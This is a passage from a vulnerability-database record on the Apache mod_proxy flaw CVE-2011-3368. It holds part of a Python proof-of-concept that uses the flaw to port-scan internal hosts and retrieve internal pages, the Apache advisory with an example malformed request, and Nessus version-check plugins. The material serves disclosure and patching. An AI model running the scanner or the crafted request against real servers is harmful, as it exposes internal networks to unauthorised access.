get_banner(result):\r\n return result[string.find(result, "\\r\\n\\r\\n")+4:]\r\n \r\n \r\ndef scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource):\r\n \r\n print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource)\r\n for port in tested_ports:\r\n port = str(port)\r\n result = send_request(url, apache_target, apache_port, internal_target, port, resource)\r\n if string.find(result,"HTTP/1.1 200")!=-1 or \\\r\n 
string.find(result,"HTTP/1.1 30")!=-1 or \\\r\n string.find(result,"HTTP/1.1 502")!=-1:\r\n print "- Open port: " + port + "/TCP"\r\n print get_banner(result)\r\n elif len(result)==0:\r\n print "- Filtered port: " + port + "/TCP"\r\n else:\r\n print "- Closed port: " + port + "/TCP"\r\n \r\n \r\ndef usage():\r\n print\r\n print "CVE-2011-3368 proof of concept by Rodrigo Marcos"\r\n print "http://www.secforce.co.uk"\r\n print\r\n print "usage():"\r\n print "python apache_scan.py [options]"\r\n print\r\n print " [options]"\r\n print " -r: Remote Apache host"\r\n print " -p: Remote Apache port (default is 80)"\r\n print " -u: URL on the remote web server (default is /)"\r\n print " -d: Host in the DMZ (default is 127.0.0.1)"\r\n print " -e: Port in the DMZ (enables 'single port scan')"\r\n print " -g: GET request to the host in the DMZ (default is /)"\r\n print " -h: Help page"\r\n print\r\n print "examples:"\r\n print " - Port scan of the remote host"\r\n print " python apache_scan.py -r www.example.com -u /images/test.gif"\r\n print " - Port scan of a host in the DMZ"\r\n print " python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local"\r\n print " - Retrieve a resource from a host in the DMZ"\r\n print " python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local -e 80 -g /accounts/index.html"\r\n print\r\n \r\ndef print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource):\r\n print\r\n print "CVE-2011-3368 proof of concept by Rodrigo Marcos"\r\n print "http://www.secforce.co.uk"\r\n print\r\n print " [+] Target: " + apache_target\r\n print " [+] Target port: " + apache_port\r\n print " [+] Internal host: " + internal_target\r\n print " [+] Tested ports: " + str(tested_ports)\r\n print " [+] Internal resource: " + resource\r\n print\r\n \r\n \r\ndef main():\r\n \r\n global apache_target\r\n global apache_port\r\n global url\r\n global internal_target\r\n global internal_port\r\n global 
resource\r\n \r\n try:\r\n opts, args = getopt.getopt(sys.argv[1:], "u:r:p:d:e:g:h", ["help"])\r\n except getopt.GetoptError:\r\n usage()\r\n sys.exit(2)\r\n \r\n try:\r\n for o, a in opts:\r\n if o in ("-h", "--help"):\r\n usage()\r\n sys.exit(2)\r\n if o == "-u":\r\n url=a\r\n if o == "-r":\r\n apache_target=a\r\n if o == "-p":\r\n apache_port=a\r\n if o == "-d":\r\n internal_target = a\r\n if o == "-e":\r\n internal_port=a\r\n if o == "-g":\r\n resource=a \r\n \r\n except getopt.GetoptError:\r\n usage()\r\n sys.exit(2)\r\n \r\n if apache_target == "":\r\n usage()\r\n sys.exit(2)\r\n \r\n \r\nurl = "/"\r\napache_target = ""\r\napache_port = "80"\r\ninternal_target = "127.0.0.1"\r\ninternal_port = ""\r\nresource = "/"\r\n \r\nmain()\r\n \r\nif internal_port!="":\r\n tested_ports = [internal_port]\r\nelse:\r\n tested_ports = known_ports\r\n \r\nscan_host(url, apache_target, apache_port, internal_target, tested_ports, resource)\r\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-20993"}, {"lastseen": "2017-11-19T17:59:00", "description": "No description provided by source.", "published": "2011-10-06T00:00:00", "title": "Apache mod_proxy Reverse Proxy Exposure", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3368"], "modified": "2011-10-06T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20969", "id": "SSV:20969", "sourceData": "\n -----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nApache HTTP Server Security Advisory\r\n====================================\r\n\r\nTitle: mod_proxy reverse proxy exposure\r\n\r\nCVE: CVE-2011-3368\r\nDate: 20111005\r\nProduct: Apache HTTP Server\r\nVersions: httpd 1.3 all versions, httpd 2.x all versions\r\n\r\nDescription:\r\n============\r\n\r\nAn exposure was reported affecting the use of Apache HTTP Server in\r\nreverse proxy mode. 
We would like to thank Context Information\r\nSecurity Ltd for reporting this issue to us.\r\n\r\nWhen using the RewriteRule or ProxyPassMatch directives to configure a\r\nreverse proxy using a pattern match, it is possible to inadvertently\r\nexpose internal servers to remote users who send carefully crafted\r\nrequests. The server did not validate that the input to the pattern\r\nmatch was a valid path string, so a pattern could expand to an\r\nunintended target URL.\r\n\r\nFor future releases of the Apache HTTP Server, the software will\r\nvalidate the request URI, correcting this specific vulnerability. The\r\ndocumentation has been updated to reflect the more general risks with\r\npattern matching in a reverse proxy configuration.\r\n\r\nDetails:\r\n========\r\n\r\nA configuration like one of the following examples:\r\n\r\n RewriteRule (.*)\\.(jpg|gif|png) http://images.example.com$1.$2 [P]\r\n ProxyPassMatch (.*)\\.(jpg|gif|png) http://images.example.com$1.$2\r\n\r\ncould result in an exposure of internal servers. A request of the form:\r\n\r\n GET @other.example.com/something.png HTTP/1.1\r\n\r\nwould get translated to a target of:\r\n\r\n http://images.example.com@other.example.com/something.png\r\n\r\nThis will cause the proxy to connect to the hostname\r\n"other.example.com", as the "images.example.com@" segment would be\r\ntreated as user credentials when parsing the URL. This would allow a\r\nremote attacker the ability to proxy to hosts other than those\r\nexpected, which could be a security exposure in some circumstances.\r\n\r\nThe request-URI string in this example,\r\n"@other.example.com/something.png", is not valid according to the HTTP\r\nspecification, since it neither an absolute URI\r\n("http://example.com/path") nor an absolute path ("/path"). 
For\r\nfuture releases, the server has been patched to reject such requests,\r\ninstead returning a "400 Bad Request" error.\r\n\r\nActions:\r\n========\r\n\r\nApache HTTPD users should examine their configuration files to determine \r\nif they have used an insecure configuration for reverse proxying. \r\nAffected users can update their configuration, or apply the patch from:\r\n\r\n http://www.apache.org/dist/httpd/patches/apply_to_2.2.21/\r\n\r\nFor example, the above RewriteRule could be changed to:\r\n\r\n RewriteRule /(.*)\\.(jpg|gif|png) http://images.example.com/$1.$2 [P]\r\n\r\nto ensure the pattern only matches against paths with a leading "/".\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.11 (GNU/Linux)\r\n\r\niEYEARECAAYFAk6MZZAACgkQR/aWnQ5EzwxdfQCg0yX+OplatMPQcweRneRmh5Xp\r\n5sEAoLooi9H4LW12oPgStNbY2wtyQrYP\r\n=8qjg\r\n-----END PGP SIGNATURE-----\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-20969"}], "nessus": [{"lastseen": "2021-01-07T10:50:36", "description": "Apache HTTP server project reports :\n\nAn exposure was found when using mod_proxy in reverse proxy mode. In\ncertain configurations using RewriteRule with proxy flag, a remote\nattacker could cause the reverse proxy to connect to an arbitrary\nserver, possibly disclosing sensitive information from internal web\nservers not directly accessible to attacker. 
There is no patch against\nthis issue!", "edition": 25, "published": "2011-11-15T00:00:00", "title": "FreeBSD : Apache 1.3 -- mod_proxy reverse proxy exposure (d8c901ff-0f0f-11e1-902b-20cf30e32f6d)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368"], "modified": "2011-11-15T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:apache+mod_ssl+ipv6", "p-cpe:/a:freebsd:freebsd:apache+mod_perl", "p-cpe:/a:freebsd:freebsd:ru-apache+mod_ssl", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:apache+ipv6", "p-cpe:/a:freebsd:freebsd:ru-apache-1.3", "p-cpe:/a:freebsd:freebsd:apache+ssl", "p-cpe:/a:freebsd:freebsd:apache+mod_ssl", "p-cpe:/a:freebsd:freebsd:apache"], "id": "FREEBSD_PKG_D8C901FF0F0F11E1902B20CF30E32F6D.NASL", "href": "https://www.tenable.com/plugins/nessus/56816", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56816);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-3368\");\n\n script_name(english:\"FreeBSD : Apache 1.3 -- mod_proxy reverse proxy exposure (d8c901ff-0f0f-11e1-902b-20cf30e32f6d)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Apache HTTP server project reports :\n\nAn exposure was found when using mod_proxy in reverse proxy mode. 
In\ncertain configurations using RewriteRule with proxy flag, a remote\nattacker could cause the reverse proxy to connect to an arbitrary\nserver, possibly disclosing sensitive information from internal web\nservers not directly accessible to attacker. There is no patch against\nthis issue!\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://httpd.apache.org/security/vulnerabilities_13.html\"\n );\n # http://seclists.org/fulldisclosure/2011/Oct/232\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://seclists.org/fulldisclosure/2011/Oct/232\"\n );\n # https://vuxml.freebsd.org/freebsd/d8c901ff-0f0f-11e1-902b-20cf30e32f6d.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?60d9264c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+ipv6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl+ipv6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ru-apache+mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ru-apache-1.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/14\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"apache<1.3.43\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+ssl<1.3.43.1.59_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+ipv6<1.3.43\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_perl<1.3.43\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl<1.3.41+2.8.31_4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl+ipv6<1.3.41+2.8.31_4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ru-apache-1.3<1.3.43+30.23_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ru-apache+mod_ssl<1.3.43+30.23_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-07T11:53:25", "description": "A vulnerability has been discovered and corrected in apache :\n\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly\ninteract with use of (1) RewriteRule and (2) 
ProxyPassMatch pattern\nmatches for configuration of a reverse proxy, which allows remote\nattackers to send requests to intranet servers via a malformed URI\ncontaining an initial \\@ (at sign) character (CVE-2011-3368).\n\nPackages for 2009.0 are provided as of the Extended Maintenance\nProgram. Please visit this link to learn more:\nhttp://store.mandriva.com/product_info.php?cPath=149&products_id=490\n\nThe updated packages have been patched to correct this issue.", "edition": 25, "published": "2011-10-10T00:00:00", "title": "Mandriva Linux Security Advisory : apache (MDVSA-2011:144)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368"], "modified": "2011-10-10T00:00:00", "cpe": ["cpe:/o:mandriva:linux:2011", "p-cpe:/a:mandriva:linux:apache-mpm-worker", "cpe:/o:mandriva:linux:2009.0", "p-cpe:/a:mandriva:linux:apache-mod_ssl", "p-cpe:/a:mandriva:linux:apache-mod_ldap", "p-cpe:/a:mandriva:linux:apache-mpm-event", "p-cpe:/a:mandriva:linux:apache-modules", "p-cpe:/a:mandriva:linux:apache-htcacheclean", "p-cpe:/a:mandriva:linux:apache-devel", "p-cpe:/a:mandriva:linux:apache-mod_proxy_scgi", "p-cpe:/a:mandriva:linux:apache-mod_dav", "p-cpe:/a:mandriva:linux:apache-mod_dbd", "p-cpe:/a:mandriva:linux:apache-mod_mem_cache", "p-cpe:/a:mandriva:linux:apache-mod_proxy", "p-cpe:/a:mandriva:linux:apache-mpm-peruser", "p-cpe:/a:mandriva:linux:apache-mod_file_cache", "p-cpe:/a:mandriva:linux:apache-mod_authn_dbd", "cpe:/o:mandriva:linux:2010.1", "p-cpe:/a:mandriva:linux:apache-source", "p-cpe:/a:mandriva:linux:apache-base", "p-cpe:/a:mandriva:linux:apache-mod_deflate", "p-cpe:/a:mandriva:linux:apache-mod_proxy_ajp", "p-cpe:/a:mandriva:linux:apache-mod_disk_cache", "p-cpe:/a:mandriva:linux:apache-mod_reqtimeout", "p-cpe:/a:mandriva:linux:apache-mpm-itk", "p-cpe:/a:mandriva:linux:apache-mpm-prefork", "p-cpe:/a:mandriva:linux:apache-mod_cache", "p-cpe:/a:mandriva:linux:apache-mod_userdir"], "id": "MANDRIVA_MDVSA-2011-144.NASL", "href": 
"https://www.tenable.com/plugins/nessus/56428", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2011:144. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56428);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-3368\");\n script_bugtraq_id(49957);\n script_xref(name:\"MDVSA\", value:\"2011:144\");\n\n script_name(english:\"Mandriva Linux Security Advisory : apache (MDVSA-2011:144)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been discovered and corrected in apache :\n\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly\ninteract with use of (1) RewriteRule and (2) ProxyPassMatch pattern\nmatches for configuration of a reverse proxy, which allows remote\nattackers to send requests to intranet servers via a malformed URI\ncontaining an initial \\@ (at sign) character (CVE-2011-3368).\n\nPackages for 2009.0 are provided as of the Extended Maintenance\nProgram. 
Please visit this link to learn more:\nhttp://store.mandriva.com/product_info.php?cPath=149 products_id=490\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-htcacheclean\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_authn_dbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_dav\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_dbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_deflate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_disk_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_file_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_mem_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_proxy_ajp\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_proxy_scgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_reqtimeout\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_userdir\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-event\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-peruser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-source\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2011\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-base-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-devel-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-htcacheclean-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_authn_dbd-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_cache-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_dav-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_dbd-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_deflate-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_disk_cache-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_file_cache-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) 
flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_ldap-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_mem_cache-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_proxy-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_proxy_ajp-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_ssl-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_userdir-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-modules-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mpm-event-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mpm-itk-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mpm-peruser-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mpm-prefork-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mpm-worker-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-source-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-base-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-devel-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-htcacheclean-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_authn_dbd-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", 
reference:\"apache-mod_cache-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_dav-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_dbd-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_deflate-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_disk_cache-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_file_cache-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_ldap-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_mem_cache-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_proxy-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_proxy_ajp-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_proxy_scgi-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_reqtimeout-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_ssl-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_userdir-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-modules-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mpm-event-2.2.15-3.4mdv2010.2\", 